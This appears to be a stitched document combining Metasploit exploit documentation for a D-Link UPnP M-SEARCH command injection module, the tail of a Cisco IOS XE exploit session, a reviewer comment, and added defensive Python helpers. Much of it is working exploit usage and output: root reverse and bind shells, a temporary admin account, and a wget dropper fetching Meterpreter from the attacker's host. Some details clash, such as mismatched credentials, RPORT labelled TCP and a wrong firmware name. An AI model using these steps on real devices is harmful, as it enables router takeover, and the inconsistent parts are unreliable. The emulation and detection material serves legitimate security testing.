Computer : router
OS : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'aZIYJugi' with password 'RziZqysr'
[*] Removing user 'aZIYJugi'
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.59:56584) at 2023-11-06 16:43:30 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.59 - Command shell session 4 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
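Review bot: the run output shows the module creating a privilege 15 user (`[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'`) and removing it afterwards, but the documentation never mentions this side effect; say that a temporary administrative account is created on the device and that, if the module fails between the create and remove steps, the account is left behind and must be removed by hand, since that is exactly the artefact defenders look for on a compromised IOS XE device. Relatedly, the description says the module "leverages both CVE-2023-20198 and CVE-2023-20273" without saying which step each provides; the referenced auxiliary module `cisco_ios_xe_cli_exec_cve_2023_20198` suggests the first is what grants the privileged CLI access, so one sentence tying the account-creation step to that CVE and the root-level payload execution to the other would make the chain understandable. The CISCO_VRF_NAME paragraph mentions only 'global', while the option's own description in the tables says both 'fwd' and 'global' have been tested; keep the two consistent. Minor: "Setup a virtualized environment" should be "Set up", "payloads network transport" should be "payload's", "a devices configuration" should be "a device's", and the serial-console transcript switches from `Router(config)#` to `router(config)#` part-way through, which looks like a copy error.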
@@ -0,0 +1,267 @@
## Vulnerable Application
This vulnerability is based on an old theme that was discovered in 2013 by `Zach Cutlip` and explained in
his blog [The Shadow File](https://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html).
It is based on the infamous `UPnP` attack where a command injection vulnerability exists in multiple D-Link network products,
allowing an attacker to inject arbitrary command to the `UPnP` via a crafted M-SEARCH packet.
Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform
a remote command execution by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet.
## Installation
Ideally, to test this module, you would need a vulnerable D-Link device.
However, by downloading the firmware and install and use `FirmAE` to emulate the router,
we can simulate the router and test the vulnerable endpoint.
This module has been tested on:
- [ ] FirmAE running on Kali Linux 2023.3
* D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
* D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
* D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
* D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
* D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
* D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
* D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
* D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
* D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
* D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
* D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
* D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
* D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
* D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
* D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
* D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
* D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
* D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
* D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
* D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
* D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
* D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
* D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
* D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
* probably more looking at the scale of impacted devices :-(
### Installation steps to emulate the router firmware with FirmAE
* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
* To emulate the specific firmware that comes with the D-Link devices, `binwalk` might need to be able to handle a sasquatch filesystem.
* Follow installation and compilation steps that you can find [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
* Download the vulnerable firmware from D-Link [here](http://legacyfiles.us.dlink.com/).
* Pick `DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP` for the demonstration.
* Start emulation.
* First run `./init.sh` to initialize and start the Postgress database.
* Start a debug session `./run.sh -d d-link /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP`
* This will take a while, but in the end you should see the following...
```shell
[*] /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.47.0 (5-Feb-2023)
e2fsck 1.47.0 (5-Feb-2023)
[*] infer network start!!!
[IID] 25
[MODE] debug
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
[+] Run debug!
Creating TAP device tap25_0...
Set 'tap25_0' persistent and owned by uid 0
Initializing VLAN...
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
import telnetlib
[*] firmware - DIR600B6_FW215WWb02
[*] IP - 192.168.0.1
[*] connecting to netcat (192.168.0.1:31337)
[+] netcat connected
------------------------------
| FirmAE Debugger |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
/ # uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
/ # hostname
dlinkrouter
/ #
```
* You should now be able to `ping` the network address 192.168.0.1 from your host and
* run a `nmap` command to check the services (HTTP TCP port 80 and UPNP UDP port 1900)
```shell
# ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
^C
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
# nmap 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
Nmap scan report for 192.168.0.1
Host is up (0.022s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
443/tcp open https
8181/tcp open intermapper
49152/tcp open unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
# nmap -sU 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
67/udp open|filtered dhcps
137/udp open|filtered netbios-ns
1900/udp open|filtered upnp
5353/udp open zeroconf
5355/udp open|filtered llmnr
19541/udp open|filtered jcp
MAC Address: 00:DE:FA:1A:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1054.98 seconds
```
You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
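The readiness check above can be scripted. The following is an added example, not part of FirmAE or the Metasploit module: it parses nmap's normal output for the two services the module depends on (HTTP on TCP/80 for discovery, SSDP on UDP/1900 for the M-SEARCH request) and reports what is missing. The sample output is constructed from the scan shown above; `open|filtered` is accepted because UDP probes that get no reply are reported that way by nmap even when the service is up.

```python
"""Lab-readiness check: confirm the ports the module needs are reachable on
the emulated router by parsing nmap's normal output.
Added example; not part of the Metasploit module or of FirmAE."""
import re

# Constructed sample: a TCP and a UDP scan of the emulated DIR-865L, trimmed
# from the output shown earlier on this page.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
Nmap scan report for 192.168.0.1
Host is up (0.022s latency).
Not shown: 995 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
49152/tcp open  unknown
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
PORT      STATE         SERVICE
53/udp    open          domain
67/udp    open|filtered dhcps
1900/udp  open|filtered upnp
5353/udp  open          zeroconf
"""

# One nmap port line: "<port>/<proto>  <state>  <service>"
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(open(?:\|filtered)?|closed|filtered)\s+(\S+)")


def parse_nmap(text):
    """Return {(port, proto): (state, service)} for every port line found."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4))
    return ports


# Services the module relies on and the option each one backs.
REQUIRED = {
    (80, "tcp"): "HTTP_PORT (device/version discovery)",
    (1900, "udp"): "RPORT (UPnP SSDP)",
}


def lab_ready(ports):
    """Return (ok, problems). Any state starting with 'open' is accepted,
    so 'open|filtered' on UDP/1900 does not count as a problem."""
    problems = []
    for key, role in REQUIRED.items():
        state = ports.get(key, ("missing",))[0]
        if not state.startswith("open"):
            problems.append(f"{key[0]}/{key[1]} is {state}; needed for {role}")
    return (not problems, problems)


if __name__ == "__main__":
    ok, problems = lab_ready(parse_nmap(SAMPLE_NMAP_OUTPUT))
    print("ready" if ok else "\n".join(problems))
```

Feed it a real scan with `nmap 192.168.0.1 > tcp.txt; nmap -sU 192.168.0.1 > udp.txt` and pass the concatenated files to `parse_nmap`; the regex only looks at port lines, so banner and summary lines are ignored.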
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/upnp/dlink_upnp_msearch_exec`
- [x] `set rhosts <ip-target>`
- [x] `set rport 1900`
- [x] `set http_port 80`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=Unix Command, 1=Linux Dropper>`
- [x] `exploit`
You should get a `shell` or `Meterpreter` session.
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > options
Module options (exploit/linux/upnp/dlink_upnp_msearch_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1900 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
HTTP_PORT 80 yes Universal Plug and Play (UPnP) UDP port
URIPATH no The URI to use for this exploit (default is random)
URN urn:device:1 no Set URN payload
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/bind_busybox_telnetd):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGIN_CMD /bin/sh yes Command telnetd will execute on connect
LPORT 4444 yes The listen port
RHOST 192.168.0.1 no The target address
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
```
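The module targets the SSDP listener on UDP/1900 and uses the `URN` option as the carrier for its payload. From the defender's side, the useful observation is that a legitimate M-SEARCH search target is a narrow token (`ssdp:all`, `upnp:rootdevice`, a `uuid:` or a `urn:` value) that never needs whitespace, quotes or shell metacharacters. The following added example (not part of the Metasploit module, and written on the assumption, which this page does not state outright, that the injected content travels in the `ST` header) parses an SSDP datagram and flags requests whose `ST` value is not well formed. The two datagrams are constructed samples, not captured traffic.

```python
"""Detection helper for UDP/1900: parse SSDP M-SEARCH requests and flag
those whose ST (search target) header is not a well-formed token.
Added example; not part of the Metasploit module. Assumes (not stated on the
page) that the module's URN option is delivered in the ST header."""
import re

# Search targets SSDP defines. The character set for uuid:/urn: is kept
# deliberately strict: no whitespace, quotes, or shell metacharacters.
VALID_ST = re.compile(
    r"^(ssdp:all|upnp:rootdevice|uuid:[A-Za-z0-9-]+|urn:[A-Za-z0-9.:_-]+)$")


def parse_msearch(datagram: bytes):
    """Return a dict of headers for an M-SEARCH request, or None if the
    datagram is not an M-SEARCH (or is not parsable as one)."""
    try:
        text = datagram.decode("ascii")
    except UnicodeDecodeError:
        return None  # SSDP is ASCII; anything else is not a request we parse
    lines = text.split("\r\n")
    if not lines or not lines[0].startswith("M-SEARCH * HTTP/1.1"):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:  # empty line ends the header block
            break
        name, sep, value = line.partition(":")
        if not sep:
            return None  # header line without a colon: malformed request
        headers[name.strip().upper()] = value.strip()
    return headers


def classify(datagram: bytes) -> str:
    """'benign' (ST well formed), 'suspicious' (ST missing or malformed)
    or 'ignore' (not an M-SEARCH request)."""
    headers = parse_msearch(datagram)
    if headers is None:
        return "ignore"
    st = headers.get("ST", "")
    return "benign" if VALID_ST.match(st) else "suspicious"


# Constructed samples (not captured traffic).
BENIGN = (b"M-SEARCH * HTTP/1.1\r\n"
          b"HOST: 239.255.255.250:1900\r\n"
          b"MAN: \"ssdp:discover\"\r\n"
          b"MX: 2\r\n"
          b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n")
SUSPICIOUS = (b"M-SEARCH * HTTP/1.1\r\n"
              b"HOST: 239.255.255.250:1900\r\n"
              b"MAN: \"ssdp:discover\"\r\n"
              b"MX: 2\r\n"
              b"ST: urn:device:1;not a urn\r\n\r\n")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, "->", classify(pkt))
```

`classify` is meant to sit behind a UDP/1900 capture (for example a socket bound to the multicast group, or datagrams pulled from a pcap); the module's default `URN` of `urn:device:1` passes `VALID_ST`, so the check keys on malformed targets rather than on any particular string.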
## Options
### HTTP_PORT
Port on which the device's HTTP and SOAP service is running, typically port 80.
The module uses it to discover the D-Link hardware model and firmware version by scraping the web or SOAP response.
## Scenarios
### FirmAE D-Link DIR-865L Router Emulation Unix Command - cmd/unix/bind_busybox_telnetd
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check
[*] Checking if 192.168.0.1:1900 can be exploited.
[*] 192.168.0.1:1900 - The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 1 opened (192.168.0.2:42349 -> 192.168.0.1:4444) at 2023-10-17 18:35:36 +0000
Shell Banner:
_!_
# uname -a
uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
# hostname
hostname
dlinkrouter
#
```
### FirmAE D-Link DIR-865L Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
```shell
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 1
target => 1
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set payload linux/mipsle/meterpreter_reverse_tcp
payload => linux/mipsle/meterpreter_reverse_tcp
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.0.2:8080/5W7O47FX
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /5W7O47FX
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.1:59600) at 2023-10-17 18:45:12 +0000
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.0.1
OS : (Linux 4.1.17+)
Architecture : mips
BuildTuple : mipsel-linux-muslsf
Meterpreter : mipsle/linux
meterpreter > getuid
Server username: root
meterpreter >
```
## Limitations
Staged Meterpreter payloads might core dump on the target, so use stageless Meterpreter payloads with the Linux Dropper target.
Some D-Link devices do not have the `wget` command; in that case configure `echo` as the command-stager flavor with `set CMDSTAGER::FLAVOR echo`.